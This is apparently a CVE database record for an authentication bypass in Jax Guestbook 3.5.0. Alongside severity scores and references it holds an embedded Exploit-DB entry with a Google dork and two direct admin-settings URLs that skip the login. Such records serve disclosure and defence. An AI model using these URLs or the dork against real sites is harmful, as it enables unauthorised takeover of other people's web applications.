ID CVE-2009-4447
Type cve
Reporter cve@mitre.org
Modified 2017-08-17T01:31:00
Description
Jax Guestbook 3.5.0 allows remote attackers to bypass authentication and modify administrator settings via a direct request to admin/guestbook.admin.php.
{"id": "CVE-2009-4447", "bulletinFamily": "NVD", "title": "CVE-2009-4447", "description": "Jax Guestbook 3.5.0 allows remote attackers to bypass authentication and modify administrator settings via a direct request to admin/guestbook.admin.php.", "published": "2009-12-29T20:41:00", "modified": "2017-08-17T01:31:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4447", "reporter": "cve@mitre.org", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/55077", "http://www.securityfocus.com/bid/37466", "http://secunia.com/advisories/37921", "http://osvdb.org/61299", "http://www.exploit-db.com/exploits/10626"], "cvelist": ["CVE-2009-4447"], "type": "cve", "lastseen": "2020-10-03T11:54:20", "edition": 3, "viewCount": 19, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:10626"]}], "modified": "2020-10-03T11:54:20", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2020-10-03T11:54:20", "rev": 2}, "vulnersScore": 6.9}, "cpe": ["cpe:/a:jax_scripts:jax_guestbook:3.5.0"], "affectedSoftware": [{"cpeName": "jax_scripts:jax_guestbook", "name": "jax scripts jax guestbook", "operator": "eq", "version": "3.5.0"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:jax_scripts:jax_guestbook:3.5.0:*:*:*:*:*:*:*"], "cwe": ["CWE-287"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:jax_scripts:jax_guestbook:3.5.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"exploitdb": [{"lastseen": "2016-02-01T12:52:03", "description": "Jax Guestbook 3.50 Admin Login Exploit. CVE-2009-4447. Webapps exploit for php platform", "published": "2009-12-24T00:00:00", "type": "exploitdb", "title": "Jax Guestbook 3.50 Admin Login Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4447"], "modified": "2009-12-24T00:00:00", "id": "EDB-ID:10626", "href": "https://www.exploit-db.com/exploits/10626/", "sourceData": "# Exploit Title: Jax Guestbook 3.50 Admin Login Exploit\r\n# Date: December 23rd, 2009\r\n# Author: Sora\r\n# Software Link: http://script.wareseeker.com/ASP-NET/jax-guestbook-3.50.zip/32956d53cf\r\n# Version: 3.50\r\n# Tested on: Windows and Linux\r\n\r\n-------------------------------------------\r\n>> Jax Guestbook 3.50 Admin Login Exploit\r\n>> Description: Jax Guestbook 3.50 suffers a bug that will allow you to log in as the admin.\r\n>> Found by: Sora\r\n>> Contact: vhr95zw [at] hotmail.com\r\n>> Google Dork: \"inurl:guestbook.admin.php?action=settings\"\r\n\r\nWe can access the admin directory of Jax Guestbook 3.50 to edit the admin settings.\r\n\r\n# Code: http://www.site.com/admin/gaestebuch/admin/guestbook.admin.php?action=settings&guestbook_id=0&language=english&gmt_ofs=0 <German>\r\nhttp://www.site.com/admin/guestbook/admin/guestbook.admin.php?action=settings&guestbook_id=0&language=english&gmt_ofs=0 <English>\r\n\r\n# Greetz: Bw0mp, Popc0rn, Xermes, T3eS, Timeb0mb, [H]aruhiSuzumiya, and Revelation!\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/10626/"}]}